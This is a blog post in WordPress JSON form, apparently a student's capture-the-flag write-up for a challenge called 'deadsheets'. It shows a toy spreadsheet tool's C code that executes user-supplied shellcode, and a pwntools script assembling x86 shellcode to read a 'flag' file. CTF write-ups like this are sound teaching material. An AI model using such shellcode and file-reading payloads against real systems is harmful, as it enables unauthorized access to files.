{"id":167,"date":"2023-04-18T00:59:31","date_gmt":"2023-04-18T00:59:31","guid":{"rendered":"https:\/\/blogs.oregonstate.edu\/paul\/?p=167"},"modified":"2023-04-18T01:02:01","modified_gmt":"2023-04-18T01:02:01","slug":"writeup-deadsheets","status":"publish","type":"post","link":"https:\/\/blogs.oregonstate.edu\/paul\/2023\/04\/18\/writeup-deadsheets\/","title":{"rendered":"Writeup: deadsheets"},"content":{"rendered":"\n

Spreadsheets. They are cloud-native ways to turn data into insights. They save time with extensible interfaces that jumpstart trend analysis. But until now, they’ve never run shellcode. <\/p>\n\n\n\n

Introducing powered by dead\u00ae: Dangerously Extensible Ancient Database. The only database firmware fearless enough to strip away the stringy\/chewy meat of traditional spreadsheet software and leave only the pure and perfect shell.<\/p>\n\n\n

\n
\"\"
Wow!<\/figcaption><\/figure>\n<\/div>\n\n\n
\u276f .\/dead\ndead: CLI utility for the Dangerously Extensible Ancient Database\n\nUsage: .\/dead <filename> <operation> [cell] [argument]\n  filename      Name of the file update\n  operation     UPDATE or UPDATE_EX\n  cell          If operation is UPDATE or UPDATE_EX, specifies the row,column of the\n                cell on which to perform the update operation\n  argument      If operation is UPDATE, specifies the value to update the cell with\n                If operation is UPDATE_EX, specifies the base64 encoded shellcode used\n                to update the cell. The shellcode starts at address 0x804c080<\/code><\/pre>\n\n\n\n
Source code and this message show that UPDATE_EX really does execute some shellcode. <\/p>\n\n\n\n
    if (ex) {\n        int shellcode_length;\n\t\tchar *decoded = base64_decode(argument, &shellcode_length);\n        shellcode_length = shellcode_length < MAX_LEN ? shellcode_length : MAX_LEN;\n        memcpy(shellcode, decoded, shellcode_length);\n        free(decoded);\n\n        \/\/ Run shellcode to determine the value with which to update the cell\n        mprotect(shellcode - ((long int)shellcode % 4096), 4096, PROT_READ | PROT_WRITE | PROT_EXEC);\n        char *(*shellcode_func)() = (char *(*)())shellcode;\n        char *result = shellcode_func();\n        \n        \/\/ Copy the result of running the shellcode into the cell\n        contents[row][col] = malloc(strlen(argument) + 1);\n        memcpy(contents[row][col], result, strlen(result) + 1);\n    }\n<\/code><\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
This database updates upon refresh. Entering most strings (that don’t correspond to b64 shellcode that returns a pointer to a string) results in an empty cell. If the shellcode does return such a pointer, it will contain the contents of that string. For example, the address 0x804973c corresponds to the string “=” in memory. Shellcode <\/p>\n\n\n\n
mov eax,0x804973c
ret<\/code><\/pre>\n\n\n\n
 (base64 uDyXBAjD)<\/p>\n\n\n\n
results in a cell with these contents:<\/p>\n\n\n
\n
\"\"<\/figure>\n<\/div>\n\n\n
So if we write shellcode that reads a file named “flag” into a buffer, whose address is moved to eax…<\/p>\n\n\n
\n#!\/usr\/bin\/python\nfrom pwn import *\n\nfrom base64 import b64encode\n\nbss_addr = 0x0804c060\nflag_addr = bss_addr + 5\n\npayload = asm(f"""\npushad\n\nmov eax, 0x5\npush 0x67616c66\nmov ebx, esp\nmov ecx, 0x0\nmov edx, 0x0\nint 0x80\n\nmov ebx, eax\nmov eax, 0x3\nmov ecx, {bss_addr}\nmov edx, 0x40\nint 0x80\n\n\npopad\nmov eax, {bss_addr}\nret\n""")\nprint(b64encode(payload))\n<\/pre><\/div>\n\n\n
We replace our cell with the contents of the flag file!<\/p>\n","protected":false},"excerpt":{"rendered":"
Spreadsheets. They are cloud-native ways to turn data into insights. They save time with extensible interfaces that jumpstart trend analysis. But until now, they’ve never run shellcode. Introducing powered by dead\u00ae: Dangerously Extensible Ancient Database. The only database firmware fearless enough to strip away the stringy\/chewy meat of traditional spreadsheet software and leave only the … Continue reading Writeup: deadsheets<\/span><\/a><\/p>\n","protected":false},"author":11809,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-167","post","type-post","status-publish","format-standard","hentry","category-uncategorized"],"_links":{"self":[{"href":"https:\/\/blogs.oregonstate.edu\/paul\/wp-json\/wp\/v2\/posts\/167","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blogs.oregonstate.edu\/paul\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blogs.oregonstate.edu\/paul\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blogs.oregonstate.edu\/paul\/wp-json\/wp\/v2\/users\/11809"}],"replies":[{"embeddable":true,"href":"https:\/\/blogs.oregonstate.edu\/paul\/wp-json\/wp\/v2\/comments?post=167"}],"version-history":[{"count":5,"href":"https:\/\/blogs.oregonstate.edu\/paul\/wp-json\/wp\/v2\/posts\/167\/revisions"}],"predecessor-version":[{"id":176,"href":"https:\/\/blogs.oregonstate.edu\/paul\/wp-json\/wp\/v2\/posts\/167\/revisions\/176"}],"wp:attachment":[{"href":"https:\/\/blogs.oregonstate.edu\/paul\/wp-json\/wp\/v2\/media?parent=167"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blogs.oregonstate.edu\/paul\/wp-json\/wp\/v2\/categories?post=167"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blogs.oregonstate.edu\/paul\/wp-json\/wp\/v2\/tags?post=167"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}